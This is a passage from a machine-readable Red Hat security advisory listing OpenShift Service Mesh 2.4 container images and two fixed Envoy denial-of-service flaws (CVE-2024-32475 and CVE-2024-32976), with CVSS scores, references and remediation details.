"openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, ], }, vulnerabilities: [ { cve: "CVE-2024-32475", cwe: { id: "CWE-617", name: "Reachable Assertion", }, discovery_date: "2024-04-19T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2276149", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32475", }, { category: "external", summary: "RHBZ#2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32475", url: "https://www.cve.org/CVERecord?id=CVE-2024-32475", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", url: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", }, ], release_date: "2024-04-18T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", }, { cve: "CVE-2024-32976", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-05-24T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2283145", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy's Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Brotli decompressor infinite loop", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", 